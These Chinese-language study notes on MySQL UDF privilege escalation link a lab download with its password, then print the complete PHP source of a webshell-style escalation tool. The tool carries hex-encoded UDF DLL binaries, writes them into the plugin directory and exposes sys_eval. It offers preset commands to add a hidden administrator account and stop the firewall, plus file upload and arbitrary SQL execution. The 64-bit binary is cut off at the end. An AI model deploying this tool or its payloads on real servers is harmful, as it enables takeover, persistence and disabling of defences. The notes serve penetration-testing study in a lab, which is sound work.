数据库提权【笔记总结】

文章目录

  1. 靶场地址:

    python 复制代码
     mssql提权,oracle提权(仔细看使用说明,需要修改当前绑定IP)
     https://pan.baidu.com/s/13rdGmscjy-n_iUG1ZyW_Iw?pwd=cong
     解压密码:vmlwrtg%$^sdfgg 
     administrator/abc123!

UDF提权

  #### 以有webshell

  1. 通过webshell将脚本上传可访问路径

     1.

        ```python
         <?php
         if (get_magic_quotes_gpc()) { 
         function stripslashes_deep($value) 
         { 
         $value = is_array($value) ? 
         array_map('stripslashes_deep', $value) : 
         stripslashes($value); 

         return $value; 
         } 

         $_POST = array_map('stripslashes_deep', $_POST); 
         $_GET = array_map('stripslashes_deep', $_GET); 
         $_COOKIE = array_map('stripslashes_deep', $_COOKIE); 
         $_REQUEST = array_map('stripslashes_deep', $_REQUEST); 
         } 

         session_start();
         if($_GET['action']=='logout'){
         foreach($_COOKIE["connect"] as $key=>$value){
         setcookie("connect[$key]","",time()-1);
         }
         header("Location:".$_SERVER["SCRIPT_NAME"]);
         }






         if(!empty($_POST['submit'])){
         setcookie("connect[host]",$_POST['host']);
         setcookie("connect[name]",$_POST['name']);
         setcookie("connect[pass]",$_POST['pass']);
         setcookie("connect[db]",$_POST['db']);
         $_COOKIE["connect"]["host"];
         echo "<script>location.href='?action=connect'</script>";
         }





         if(empty($_GET["action"])){
         ?>


         <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
         <html xmlns="http://www.w3.org/1999/xhtml">
         <head>
         <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
         <title>暗月mysql全版本通杀提权神器(mOon原创)</title>
         </head>








         <body>
         <form method="post" action="?action=connect">
         <table  border="1" align="center" width="300">
          <caption><h5>暗月mysql全版本通杀提权神器(mOon原创)</h5></caption>
         <tr>
         	<td width="50">HOST:</td>
         	<td width="450"><input type="text" name="host" value="localhost" size="40"></td>
         </tr>
         <tr>
         	<td>NAME:</td>
         	<td><input type="text" name="name" value="root" size="40"></td>
         </tr>
         <tr>
         	<td>PASS:</td>
         	<td><input type="text" name="pass" value="" size="40"></td>
         </tr>

         <tr>
         	<td>DB:</td>
         	<td><input type="text" name="db" value="mysql" size="40"></td>
         </tr>

         <td colspan="2"><div align="center">
                   <input type="submit" name="submit" value="提交">
         		   
                   <input type="reset" name="Submit" value="重置">
                 </div></td>
         </table>


         </form>
         <div align="center"><strong>Copyright By mOon 2014</strong><br>
         <span> <font color="red">黑客居家旅游杀人放火爆菊必备暗器</font></span><br>
         Blog:<a href="http://www.moonsec.com" target="_blank">www.moonsec.com</a> Bbs:<a href="http://www.moonsafe.com" target="_blank">www.moonsafe.com</a>
         <a href="http://www.moonsec.com" target="_blank">版本更新</a>
         </div>

         </body>
         </html>



         <?php
         exit;

         }



         echo '<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />';




         $link = mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["name"],$_COOKIE["connect"]["pass"]);

         if(!$link){
         echo "连接失败.".mysql_error()."<a href='javascript:history.back()'>返回重填</a></script>";
         exit;
         }else{
         echo "连接成功<br>";
         echo "版本信息:<br>";
         $str=mysql_get_server_info();
         echo 'MYSQL版本:'.$str."<br>";
         foreach(_ver() as $key=>$value){
         echo $key."-----".$value."<br>";
         } 
         echo "<hr>";
         if($str[2]>=1){
         $pa=str_replace('\\','/',_dir());
          $path=$_SESSION['path']=$pa."/moonudf.dll";
         }else{
         $path=$_SESSION['path']='C:/WINDOWS/moonudf.dll';
         }

         }

         $conn=mysql_select_db($_COOKIE["connect"]["db"],$link);
         if(!$conn){
         echo "数据不存在.".mysql_error()."<a href='javascript:history.back()'>返回重填</a></script>";
         exit;
         }else{
         echo "数据库--".$_COOKIE['connect']['db']."--存在<br>";
         }
         echo '<a href="?action=logout">点击退出</a><br>';

         echo '<form action="" method="post" enctype="multipart/form-data" name="form1">';
         echo  '<table width="680" height="53" border="1">';
         echo    '<tr>';
         echo      '<td colspan="2">当前路径:';  
         echo      "<input name='p' type='text' size='100' value='".dirname(__FILE__)."\'></td>";
         echo    '</tr>';
         echo    '<tr>';
         echo     '<td width="235"><input type="file" name="file"></td>';
         echo      '<td width="46"><input type="submit" name="subfile" value="上传文件"></td>';
         echo    '</tr>';
         echo  '</table>';
         echo'</form>';
         if($_POST['subfile']){
         $upfile=$_POST['p'].$_FILES['file']['name'];

         if(is_uploaded_file($_FILES['file']['tmp_name']))
         			{
         if(!move_uploaded_file($_FILES['file']['tmp_name'],$upfile)){
         echo '上传失败';
         }else{
         echo '上传成功,路径为'.$upfile;
         	  }

         			}

         					}

         echo '<hr>';
         echo '选择UDF导出的版本 win32 & win64 默认32位';
         echo '<form action="?action=dll" method="post"/>';
         echo '<input type="radio" name="udf" value="32" checked="checked">win32&nbsp';
         echo '<input type="radio" name="udf" value="64">win64&nbsp';
         echo '<hr>';
         echo '<table cellpadding="1" cellspacing="2">';
         echo '<tr><td>路径目录为:</td></tr>';
         echo "<tr><td><input type='text' name='dll' size='100' value='$path'/></td>";
         echo '<td><input type="submit" name="subudf" value="导出udf"/></td></tr>';
         echo '</table>';
         echo '</form>'; 
         echo '<hr>';



         if($_POST['subudf']){

         	if($_POST['udf']=="32"){

         			$shellcode=mysql86();

         	}else{
         			$shellcode=mysql64();
         	}


         mysql_query('DROP TABLE Temp_udf');
         $query=mysql_query('CREATE TABLE Temp_udf(udf BLOB);');
         if(!$query){
         echo '创建临时表Temp_udf失败请查看失败内容'.mysql_error();
         }else{
         $query="INSERT into Temp_udf values (CONVERT($shellcode,CHAR));";
         if(!mysql_query($query)){
         echo 'udf插入失败请查看失败内容'.mysql_error();
         }else{
         $query="SELECT udf FROM Temp_udf INTO DUMPFILE '".$path."';" ;
         if(!mysql_query($query)){
         echo 'udf导出失败请查看失败内容'.mysql_error();
         }else{
         mysql_query('DROP TABLE Temp_udf');
         echo '导出成功';
         }
         }
         }
         }


         echo '<form name="form2" method="post" action="">';
         echo  '<table width="680" height="100" border="1.2" cellpadding="0" cellspacing="1">';
         echo    '<tr>';
         echo      '<td width="100">文件路径:</td>';
         echo      '<td width="620"><input name="diy" type="text" id="diy" size="50"></td>';
         echo    '</tr>';
         echo    '<tr>';
         echo      '<td>目标路径:</td>';
         echo      '<td><input name="diypath" type="text" id="diypath" size="27" value="C:/WINDOWS/diy.dll"></td>';
         echo    '</tr>';
         echo    '<tr>';
         echo      '<td colspan="2">';

         echo        '<div align="right">';
         echo          '<input type="submit" name="Submit2" value="自定义导出">';
         echo      '</div></td></tr>';
         echo '</table>';
         echo '</form>';

         if(!empty($_POST['diy'])){
         $diy=str_replace('\\','/',$_POST['diy']);
         $diypath=str_replace('\\','/',$_POST['diypath']);
         mysql_query('DROP TABLE diy_dll');
         $s='create table diy_dll (cmd LONGBLOB)';
         if(!mysql_query($s)){
         echo '创建diy_dll表失败'.mysql_error();
         }else{
         $s="insert into diy_dll (cmd) values (hex(load_file('$diy')))";
         if(!mysql_query($s)){
         echo "插入自定义文件失败".mysql_error();
         }else{
         $s="SELECT unhex(cmd) FROM diy_dll INTO DUMPFILE '$diypath'";
         if(!mysql_query($s)){
         echo "导出自定义dll出错".mysql_error();
         }else{
         mysql_query('DROP TABLE diy_dll');
         echo "成功出自定义dll<br>";
         }

         }

         }

         }

         echo "<hr>";
         echo '自带命令:<br>';
         echo '<form action="" method="post">';
         echo '<select name="mysql">';
         echo '<option value="create function sys_eval returns string soname \'moonudf.dll\'">创建sys_eval</option>';
         echo '<option value="select sys_eval(\'net user moon$ 123456 /add & net localgroup administrators moon$ /add\')">添加超级管理员</option>';
         echo '<option value="select sys_eval(\'net user\')">查看用户</option>';
         echo '<option value="select sys_eval(\'netstat -an\')">查看端口</option>';
         echo '<option value="select sys_eval(\'net stop sharedacess\')">停止防火墙</option>';
         echo '<option value="select name from mysql.func">查看创建函数</option>';
         echo '<option value="delete from mysql.func where name=\'sys_eval\'">删除sys_eval</option>';
         echo '</select>';
         echo '&nbsp<input type="submit" value="提交" />';
         echo '</form>';

         echo '<form action="?action=sql" method="post">';
         echo '自定义SQL语句:<br>';
         echo '<textarea name="mysql" cols="90" rows="10"></textarea>';
         echo '&nbsp<input type="submit" value="执行" />';
         echo '</form>';

         echo "回显结果:<br>";
         echo '<textarea cols="90" rows="10" id="contactus" name="contactus">';
         if(!empty($_POST['mysql'])){
         echo "SQL语句:".$sql=$_POST['mysql']."\r\n";

         $sql=mysql_query($sql) or die(mysql_error());
         while($rows=@mysql_fetch_row($sql)){
         foreach($rows as $value){

         echo iconv("UTF-8", "GB2312//IGNORE",  $value);

         }
         }

         }

         echo '</textarea>';

         echo '<hr>';
         print("
         本版支持mysql win32 & win64位 提权
         但是少了某些提权功能,例如反弹函数。
         需要使用反弹函数 请使用以前的版本,但是不支持64位的mysql。

         ");


         function _dir(){
         	$sql="SHOW VARIABLES LIKE '%plugin_dir%'";
         	$row=mysql_query($sql);
         	$rows=mysql_fetch_row($row);
         	return  $rows[1];

         }
         function _ver(){
         	$_version=array();
         	$sql="show variables like '%version%'";
         	$row=mysql_query($sql);
         	while($rows=mysql_fetch_row($row)){

         	$_version += array($rows[0]=>$rows[1]);


         	}
         	return $_version;


         }



         function mysql86(){


         return "0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000F2950208B6F46C5BB6F46C5BB6F46C5B9132175BB4F46C5B9132115BB7F46C5B9132025BB4F46C5B9132015BBBF46C5B75FB315BB5F46C5BB6F46D5B9AF46C5B91321D5BB7F46C5B9132165BB7F46C5B9132145BB7F46C5B52696368B6F46C5B0000000000000000504500004C0103004E10A34D0000000000000000E00002210B010800001000000010000000600000D07B0000007000000080000000000010001000000002000004000000000000000400000000000000009000000010000000000000020000000000100000100000000010000010000000000000100000007882000008020000B0810000C800000000800000B001000000000000000000000000000000000000808400001000000000000000000000000000000000000000000000000000000000000000000000009C7D00004800000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000600000001000000000000000040000000000000000000000000000800000E055505831000000000010000000700000000E000000040000000000000000000000000000400000E02E7273726300000000100000008000000006000000120000000000000000000000000000400000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332E303500555058210D09020947A37B47FAE6101946550000C90B000000200000260000A4FFFFFFFF8B4C240833C03901741656578B7C24146A0C59BE000010DCF3A566A55FB0015EAEFDBBFDC3C38B44240C1B6A071711108BF81933FFDFEDB7181DA45FC7011E12005E210883380175128B40040DF6776F0700750A1004C6000132C0C3540A6F2FF68D3C3054A455322D08FF30BFBDFBDDFF156D8885C05975085614C601011BC8568D7101FFDBB7FF8A114184D275F98B54142BCE890A32558BEC8B4D0C8339022D36D86F5374148B7D10915C54536F67EFF7EB4C8B417D740F1B707C1BEBE58366ECFFED6004001A0C8B48048B008D4401025072A037F2DD6E4E08891875113006A44CDD96EFEDEBB2B85F5E5DA3040C287408DBF6C79E33A8591353568B742410D8785346BB707B6B02B6460851C78D5C4357E824CEDDFD770AB81400C604070008FF70041E05767B43B2531A22C4185357200300544126E136086A995B420B7E780A84033B9859991A83EC0CFB5BFBEB9735D9576800F15CD66A018945FC06BB75DD7F8BF08B450CC60600326848C03733FF396DEDEF1E9C8B1D0590506A04FF75FC2AACD37D2EBCBD991CEB402DFC8D487E10402BC1B68D6DBF18F803C7505606F4348C2BF851BBB5B1BB3003FE5710940BD47DF44463EEC21741202F75BC131CA40B03FBFF803E0059741A8BC6C64437FF00567B14DF3AB68589B3066C18285F205E5BC9C3D6B6AE73F3C951F77D5247E3306DDB2CCB5008C9C26A98F0BF1726B4B710548D4601B23B5C4F08EDDB09EE56FF31BBA0947E0C6AFF8DC082B55D7B2082EE02F8092C0FDBC6C123005FEE5E6B6A0C125E58F886909609848365FC1D4550D0EB075BD85ED81B405F65E8C742FE24FF0D0BDB855F1FC9C24E3B0D08209602DBCEFEEDF3C3E908065556688000005680965608B8BFCB1F8485F65959A32354045075054BFEED762FAC8326004308166D083E0904C70424FF098FDD06075D0B5933C0CF5533ED3BC5750EDD7F85DD392D66107E2B6E1083F8018B0810DD7D77E1548B09DB57890A23440F85CC7964A118771C61C3058104C2385521234CEB0DF6DFB5184D9D051A3BC7741768E803A03CEE76C3B6FF57A1D396E7EB036645A12BB7FBFBB7480D6A025F74096A1FE056EB3C9E10C80460FADCF7C0C7051F015E1A50267FDF77B6C007581720BC04B81B4A5989F784A6B13D4BEDBC5504408312C97DEFD258851E6807E4DE4294BBBD7769FF321C57042618FF05E0BD6F6BDF5414F7D38ECD3DCAB6C6809DC90BBE55C75BD783BD10EBBEEBB91402740AB759BE8D1DB6EB4835713B78258BD885DBB8B410DB6C3414EED7E1F8EBF45F68DA4607C102DC83EF043BFB73F1530811C682CA067CAAB4307B1B8525E32D60C77C6C7CC9BC985B5DC20C3E1029286FB86F8D8B8FF28B5D081C73E433C9F04DBBD2894D376A2008683BF1751039FFC75688B60C17E426103BF0740583FE5BA1F5EE02752EB910D03BC148897FD0DB39F7773B837DE4000F8493F6115A037F147D27D99AA71280096227FEAC9DDD6D1324FB2057501357A72F8DF6BAD852D90611537C67BB617F6A0375434F34032168746D3CECB02E2C257FEB1BF0ECA3F0BD75BB09AAE05051595CE7F9413AB5D20B2F0F013D46DA761906292AE407C31B6D5B8DAEEC16FFD79A089A052CD0307CD600D688BC109B0C770DAB0C10051E5936C981ECE18F0D8628C55D2120BC211C895A3F3EECB8211889B3211438211041210C7DED6BDF668C183806252C062008A9344BB306050425001A6C63EDFBFC9C8F14309156240704ACFDB7F428F20807348B85E0FC9CA6B67B5B6370C201A11C19202413778E513A1809C9E0201C1DB37CEE25D38985D8320A04DC7E8D6F04FF24346879DF945963EC63B04128FAD40A2CE7BDC3B6DA20110823685B9E0A678D1B3068342F033C887C5CF81E9A5B6A144650C0C391C1B435D659E7F85A1B63ED324D3970D7619FB8363BFC37AC598B2E2827ADD0BA60D90AE0F3B903B16DFBDCE450352AA612DC0AE45440DB626C60D6D30FE009859710C3D4E5D107FB371DDAD984DCD166A09EC3BB0E6EFF1A65F7D81BC00359487EB8B018BF2DB1D57A0451E5735806B0D2CB2049C6F772F11F23C28E90672020CC00D0FA054727D281394D5A748BA1F09728EE973C03C1813850CE4936F85B69F04F1878180B010F941DC1FC3612C336844825C80FB74114121BDF0A0505710633D2EC57C9FABF9DF80818761E201D0C3BF972098B580803D9D4FEB758E07221C20183C0283BD672E660619241C0C2E970BA0330D0FD7AF00052996C59AB3DF94B7CC7365D50109C59112B29244F07E1F6C1E81FF7C3E00134EB202E00C1AC636B01A33D3EC0A2B11D85942845AB105805E3A491914C50AC2D13348483A1D287206DEADC35936B204A2CE7A309E1646DA91938DE09F3186C036D0C039B8D2BE0FAA8316AC1DA89F633C5508973810B796DEF0D139E04F064A337904DC3BBDBA9096900595FFA8BE55D51D8C3BB1BD810036803276850F9C4CEC2C5B28C3E1064F82D222D20F8FEA0BF4EE640BB1ABC1958D3BB86360D85C32C33B63F15101404EB605671F8E3C61E6BED448B75948E0B1033F00714EDCC95411899271CB0E0BED1DAF4330C11137507BE4F59C02FD12EE285F30AF7C1E0100BF006E1638F4400F7D607045E5F5B495C464646C6056064686C0064474674B00000472FEC0003360F201801FF7FFBFF4E6F20617267756D656E7473096C6C6F77656420287564663A206CDCDF76FF69625F6D7973716C0D5F73085F696E666F29396DFBFFC8182076657273696F6E20302E01341FBFBDDDFD45787065637447657861076C79201A6520737472B5ADB56F3F672074791B7572617105EC00B621722B747791FD36B0801F3F8672206E616D1D7BFB8148436F756C246E6F74C463618375DBB61320186D2779AF72F148A9DD44093F2003121013DF8B05F6E119216B07D0D6D5B0200F1F2D07293BAC7B05F90B0D17CC27DD099BB0070FD81F0928033C92E85E611F030F0313E944D9000000EC1B6814E5B119BF44FF00515565110FC9A8AAB200AA645455555532AA8EA22A195C03E07FFB0410020157616974466F725388BF35007E6C654F626A99145669727475FB9B03E0616C41760D536574456E7612B6DF01706F6EC05661726961622B41753700DE184372659454680664FBADFBB60D47264375727222502A636573734914F0C1660926135469636BDB7EB701DE6E6B5175657279500366840D80587B6D616E3716FDF6F6B3F70144697367374C6962727879436192B6D6FEDB731A4973446562756767266A6865DBDB76F746A4556E684064316445784670ADB0D8DB7469AF46696C4A1957D8B694B41254176D0DD86B0D6F321149900A6B409DB9E6DC766D70876547517F77B72C61AD5551221B5C7517DA76537973186DEE3941737365EDA161E10975697C4C7D5F686FDFED0A7E396D5F2E5F616D7367087869740BD86F7F0B646A753A5F66646976260ADC0F76A1639A5F64FD5F686F6F6B13B800B6D61459725F4875017C01D15F49735EC16DCE0A330A6C21539C82056BF82A64D46E64133D6184C90F651E5F2C72346BCDB5AD56ED6D1C18700A036EDF177B5F706F52296E106468756CC9DEA3F05EB92A9B1B6CB7B5652CA8066EC5726525BD6D705B0866115673749C637079AE3517C108243932C06EADE1F6664D0FD76F7319663A1DC2F60F1F5F437070583174BC6DFFFF63AF343F0018183D193C1C1B161E552719111F0A062FFFFFFFFF111D5F10130A070D2E15090905140C1B08090B150618141505061B050C0D0608FDDBBFFD190613050D0F120F1D07050509062E0D18532D483406B7DB72F20007080C3B060A390C05DF6E6FB710070616120E0B06420B215637051F05776FB7EE9F0E5D2C0D001D4C61230D0C2E24080B97FFB7634106F0021004F02C01043808041C1C040090FE1D05ED4C0105004E10A34D867E93B6FFE00002210B0108080C8E003816B6B1B1C10B200E100B020204FEEC61C1330700600C4B070100023C1BD8C12A00100706C026DFB62B04A420AC22033C1440EB0D60750B0113509F3AB72CF62AC8214200A7BB0B0359B82F2EAB787407C20A271BD860900CC442602E61B0DBD27264746108C508FB0A139AED862D0077402E26943DA1DBC20304301B001A27061BECDBC04F73726300EB40271CF8A311C04F5C6D009A01DF948C4D03271E421BA000B463B72303D152127353030000000000000012FF00000000000000807C2408010F85B901000060BE007000108DBE00A0FFFF5783CDFFEB0D9090908A064688074701DB75078B1E83EEFC11DB72EDB80100000001DB75078B1E83EEFC11DB11C001DB73EF75098B1E83EEFC11DB73E431C983E803720DC1E0088A064683F0FF747489C501DB75078B1E83EEFC11DB11C901DB75078B1E83EEFC11DB11C975204101DB75078B1E83EEFC11DB11C901DB73EF75098B1E83EEFC11DB73E483C10281FD00F3FFFF83D1018D142F83FDFC760F8A02428807474975F7E963FFFFFF908B0283C204890783C70483E90477F101CFE94CFFFFFF5E89F7B92B0000008A07472CE83C0177F7803F0075F28B078A5F0466C1E808C1C01086C429F880EBE801F0890783C70588D8E2D98DBE005000008B0709C0743C8B5F048D8430B071000001F35083C708FF96EC710000958A074708C074DC89F95748F2AE55FF96F071000009C07407890383C304EBE16131C0C20C0083C7048D5EFC31C08A074709C074223CEF771101C38B0386C4C1C01086C401F08903EBE2240FC1E010668B0783C702EBE28BAEF47100008DBE00F0FFFFBB0010000050546A045357FFD58D870702000080207F8060287F585054505357FFD558618D4424806A0039C475FA83EC80E99F98FFFF000000480000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000101022001001000000000000000000000000000000000000000000000000000000000000000000000000000000040000000000010018000000180000800000000000000000040000000000010002000000300000800000000000000000040000000000010009040000480000005C80000052010000E404000000000000584000003C617373656D626C7920786D6C6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A61736D2E763122206D616E696665737456657273696F6E3D22312E30223E0D0A20203C646570656E64656E63793E0D0A202020203C646570656E64656E74417373656D626C793E0D0A2020202020203C617373656D626C794964656E7469747920747970653D2277696E333222206E616D653D224D6963726F736F66742E564338302E435254222076657273696F6E3D22382E302E35303630382E30222070726F636573736F724172636869746563747572653D2278383622207075626C69634B6579546F6B656E3D2231666338623362396131653138653362223E3C2F617373656D626C794964656E746974793E0D0A202020203C2F646570656E64656E74417373656D626C793E0D0A20203C2F646570656E64656E63793E0D0A3C2F617373656D626C793E50410000000000000000000000000C820000EC810000000000000000000000000000198200000482000000000000000000000000000000000000000000002482000032820000428200005282000060820000000000006E820000000000004B45524E454C33322E444C4C004D5356435238302E646C6C00004C6F61644C69627261727941000047657450726F634164647265737300005669727475616C50726F7465637400005669727475616C416C6C6F6300005669727475616C467265650000006672656500000000000000004D10A34D0000000054830000010000001200000012000000A0820000E8820000308300002210000021100000001000008F120000211000008C120000C51100002110000087110000B311000021100000871100007710000021100000441000002F1100001B110000AA100000698300007F8300009C830000B7830000C3830000D6830000E7830000F0830000008400000E8400001784000027840000358400003D8400004C84000059840000618400007084000000000100020003000400050006000700080009000A000B000C000D000E000F00100011006C69625F6D7973716C7564665F7379732E646C6C006C69625F6D7973716C7564665F7379735F696E666F006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F5F696E6974007379735F62696E6576616C007379735F62696E6576616C5F6465696E6974007379735F62696E6576616C5F696E6974007379735F6576616C007379735F6576616C5F6465696E6974007379735F6576616C5F696E6974007379735F65786563007379735F657865635F6465696E6974007379735F657865635F696E6974007379735F676574007379735F6765745F6465696E6974007379735F6765745F696E6974007379735F736574007379735F7365745F6465696E6974007379735F7365745F696E6974000000000070000010000000DD3BD83DDC3D00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000";



         }

         function mysql64(){

         return "0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000F00000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A240000000000000033C2EDE077A383B377A383B377A383B369F110B375A383B369F100B37DA383B369F107B375A383B35065F8B374A383B377A382B35BA383B369F10AB376A383B369F116B375A383B369F111B376A383B369F112B376A383B35269636877A383B300000000000000000000000000000000504500006486060070B1834B0000000000000000F00022200B020900001200000016000000000000341A0000001000000000008001000000001000000002000005000200000000000500020000000000008000000004000033CE000002004001000010000000000000100000000000000000100000000000001000000000000000000000100000000039000005020000403400003C00000000600000B002000000500000680100000000000000000000007000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000300000700100000000000000000000000000000000000000000000000000002E7465787400000011100000001000000012000000040000000000000000000000000000200000602E72646174610000050B000000300000000C000000160000000000000000000000000000400000402E64617461000000D8050000004000000002000000220000000000000000000000000000400000C02E7064617461000068010000005000000002000000240000000000000000000000000000400000402E72737263000000B0020000006000000004000000260000000000000000000000000000400000402E72656C6F630000240000000070000000020000002A00000000000000000000000000004000004200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000833A007450488B05A4210000498900488B05A221000049894008488B059F21000049894010488B059C21000049894018488B059921000049894020488B0596210000498940280FB705932100006641894030B001C332C0C3CCCCCCCCCCCCCCCC488B0581210000498900488B057F21000049894008488B057C210000498940108B057A210000418940180FB70573210000664189401C0FB605692100004188401E41C7011E000000498BC0C3CCCCCCCC833A01750F488B42088338007506C6010132C0C3488B053D210000498900488B053B21000049894008488B053821000049894010488B053521000049894018488B0532210000498940200FB7052F21000066418940280FB605252100004188402AB001C3CCCCCCCCCCCCCCCCCCCCCCCC40534883EC20488B4A10498BD9488B09FF15DA1F00004C8BD84885C0750E488B4C2450C601014883C4205BC348897C243033C04883C9FF498BFBF2AE488B7C2430498BC348F7D148FFC9890B4883C4205BC3CCCCCCCCCCCCCCCCCCCCCCCCCCCC48895C2408574883EC20833A02498BD8488BF97455488D0D64EEFFFF488B8138320000498900488B814032000049894008488B8148320000498940108B8150320000418940180FB78154320000664189401C0FB681563200004188401EB001488B5C24304883C4205FC3488B4208833800744A488D0D06EEFFFF488B8158320000498900488B816032000049894008488B816832000049894010488B817032000049894018488B817832000049894020B001488B5C24304883C4205FC3C7400400000000488B42188B48048B008D4C0102FF15E91E0000488947104885C0753F488D0D99EDFFFF488B8180320000488903488B818832000048894308488B8190320000488943100FB7819832000066894318B001488B5C24304883C4205FC332C0488B5C24304883C4205FC3CCCCCCCC4883EC28488B49104885C97406FF158D1E00004883C428C3CCCCCCCCCCCCCCCC48895C24084889742410574883EC20488B4218488B7110488BFA488B5210448B00488BCE488B12498D5C3001E8750C00004C8B5F18488BCB418B03C6043000488B4718488B5710448B4004488B5208E8520C00004C8B5F18488BD3418B4304488BCEC6041800FF15D41C0000488B5C2430488B74243848984883C4205FC3CCCC833A01750C488B4208833800750332C0C3488B05A01E0000498900488B059E1E000049894008488B059B1E000049894010488B05981E000049894018488B05951E0000498940200FB705921E000066418940280FB605881E00004188402AB001C3CCCCCCCCCCCCCCCCCCCCCCCCCCCCCC4883EC28488B4A10488B09FF155F1D000048984883C428C3CCCCCCCCCCCCCCCC4056574154415541564881EC30040000488B05092C00004833C448898424200400004C8BAC2480040000B9010000004889AC24700400004D8BF1488BFAFF151D1D0000488B4F10488D156E1E00004533E4488B09488BF0FF15FB1C0000488D4C2420BA000400004C8BC0488BE8FF15CD1C00004885C0746648899C24600400004883C9FF33C0488D7C2420F2AE48F7D1428D5C21FF488D79FF488BCE8BD3FF15941C0000418BCC488D5424204803C8448BC7488BF0FF158D1C0000488D4C24204C8BC5BA00040000448BE3FF156F1C00004885C075AA488B9C2460040000488BCDFF15811C0000803E00488BAC2470040000741F4883C9FF418D4424FF488BFEC604300033C0F2AE48F7D148FFC941890EEB0541C6450001488BC6488B8C24200400004833CCE8150100004881C430040000415E415D415C5F5EC3CCCCCCCCCC32C0C3CCCCCCCCCCCCCCCCCCCCCCCCCCC20000CCCCCCCCCCCCCCCCCCCCCCCCCC48895C24084889742418574883EC30488B7A104883C9FF33C0488B3F488BF2448D4840F2AE41B80010000048F7D1488BD1488D79FF33C9FF158B1A0000488B56104C8BC7488B12488BC8488BD8FF15951B0000488D5424484C8D054100000048895424284C8BCB33C933D2C744242000000000FF155F1A000083CAFF488BC8FF153B1A0000488B5C2440488B74245033C04883C4305FC3CCCCCCCCCCCCCCCCCC4883EC28E817000000EB0033C04883C428C3CCCCCCCCCCCCCCCCCCCCCCCCCCCC55488BEC488B4510FF10C9C3CCCCCCCCCCCCCCCCCCCC66660F1F840000000000483B0DD9290000751148C1C11066F7C1FFFF7502F3C348C1C910E935040000CC40534883EC20B900010000FF15AF1A0000488BC8488BD8FF15AB1A0000488905642F0000488905552F00004885DB75058D4301EB2348832300E816060000488D0D47060000E8F2050000488D0D2F050000E8E605000033C04883C4205BC3CCCC488BC44889580848896810488978184C8960204155415641574883EC2033FF4D8BE04C8BE93BD70F85380100008B054D2900003BC70F8E23010000FFC8448BEF89053A29000065488B042530000000488B5808EB10483BC3741AB9E8030000FF158319000033C0F0480FB11DA82E000075E3EB0641BD010000008B05902E000083F802740FB91F000000E8AF060000E9A1010000488B0D8D2E0000FF156F1900004C8BE0483BC70F8496000000488B0D6C2E0000FF15561900004D8BFC4C8BF0488BE84883ED08493BEC725A48397D0074F1FF15701900004839450074E5488B4D00FF1528190000488BD8FF155719000048894500FFD3488B0D2A2E0000FF150C190000488B0D152E0000488BD8FF15FC1800004C3BFB75054C3BF074A54C8BFB4C8BE3EB97498BCCFF1581190000FF1513190000488905E42D0000488905E52D0000893DC72D0000443BEF0F85E300000048873DBF2D0000E9D700000033C0E9D500000083FA010F85C700000065488B0425300000008BEF488B5808EB10483BC3741AB9E8030000FF155918000033C0F0480FB11D7E2D000075E3EB05BD010000008B05672D00003BC7740CB91F000000E887050000EB3E488D1530190000488D0D19190000C7053F2D000001000000E8620500003BC77584488D15F7180000488D0DE8180000E845050000C705192D0000020000003BEF750A488BC7488705132D000048393D242D00007421488D0D1B2D0000E8D60400003BC774114D8BC4BA02000000498BCDFF15012D0000FF054B270000B801000000488B5C2440488B6C2448488B7C24504C8B6424584883C420415F415E415DC3CCCCCC488BC448895808488970104889781841544883EC30498BF08BFA4C8BE1BB010000008958E88915E926000085D275123915EF260000750A33DB8958E8E9CA00000083FA01740583FA027533488B054A1800004885C07408FFD08BD88944242085DB74134C8BC68BD7498BCCE834FDFFFF8BD88944242085DB0F848D0000004C8BC68BD7498BCCE8690400008BD88944242083FF01753585C075314C8BC633D2498BCCE84D0400004C8BC633D2498BCCE8F0FCFFFF4C8B1DE11700004D85DB740B4C8BC633D2498BCC41FFD385FF740583FF0375374C8BC68BD7498BCCE8C3FCFFFFF7D81BC923CB8BD9894C2420741C488B05A61700004885C074104C8BC68BD7498BCCFFD08BD889442420EB0633DB895C2420C705F7250000FFFFFFFF8BC3488B5C2440488B742448488B7C24504883C430415CC3CCCCCC48895C24084889742410574883EC20498BF88BDA488BF183FA017505E8BF